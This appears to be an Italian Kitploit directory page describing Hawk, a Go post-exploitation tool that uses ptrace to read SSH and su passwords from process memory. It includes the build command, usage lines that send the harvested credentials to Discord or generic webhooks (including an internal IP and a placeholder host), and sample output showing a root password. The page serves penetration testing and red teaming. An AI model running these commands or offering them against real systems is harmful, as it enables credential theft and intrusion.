Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Hawk — Strumento Golang progettato per esfiltrare password trovate tramite i servizi sshd e su | Kitploit
Strumenti/GitHubGitHub/prodefense/hawk
Attacchi alle PasswordEsfiltrazione DatiRaccolta InformazioniPost-ExploitPenetration TestingRed Teaming
GitHubprodefense/hawk

Hawk

Strumento Golang progettato per esfiltrare password trovate tramite i servizi sshd e su

Vedi Repository
38639 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi



Hawk

Intercetta silenziosamente le credenziali SSH e SU in tempo reale

Hawk monitora i processi sshd e su, estraendo le password dalla memoria tramite ptrace senza modificare i processi target. Zero scritture. Pura raccolta di credenziali in sola lettura.

Demo

Esempio

Come Funziona

Hawk sfrutta il filesystem /proc di Linux per individuare i processi SSH e SU, quindi usa ptrace per agganciarsi e intercettare le syscall. Quando avviene l'autenticazione tramite password, legge la password direttamente dalla memoria del processo durante la syscall write(), in modo completamente trasparente per il processo target. Le credenziali vengono esfiltrate tramite webhook o stampate su stdout.

Approfondimento: Articolo del Blog

Build

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

Utilizzo

Discord Webhook

Hawk rileva automaticamente i webhook di Discord e invia messaggi formattati:

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

Configurazione: crea un webhook nel tuo server Discord seguendo la guida ai webhook di Discord. Le credenziali appariranno nel tuo canale formattate con hostname, nome utente e password.

Webhook Generici

Per altri servizi webhook (webhook.site, server personalizzati, ecc.):

root@kitploit:~
# HTTPS (rilevato automaticamente)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# HTTPS automatico se non viene specificato alcun protocollo
./hawk webhook.example.com/path

Modalità Stdout

Niente webhook? Le credenziali vengono stampate su stdout:

root@kitploit:~
./hawk

Output:

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

Requisiti

  • Sistema Linux con ptrace abilitato
  • Filesystem /proc montato
  • Privilegi di root (richiesti per ptrace)

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. L'accesso non autorizzato a sistemi informatici è illegale. Usalo con responsabilità e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione ai test.

Riconoscimenti

Ispirato dal lavoro di blendin su 3snake.

Scarica lo strumento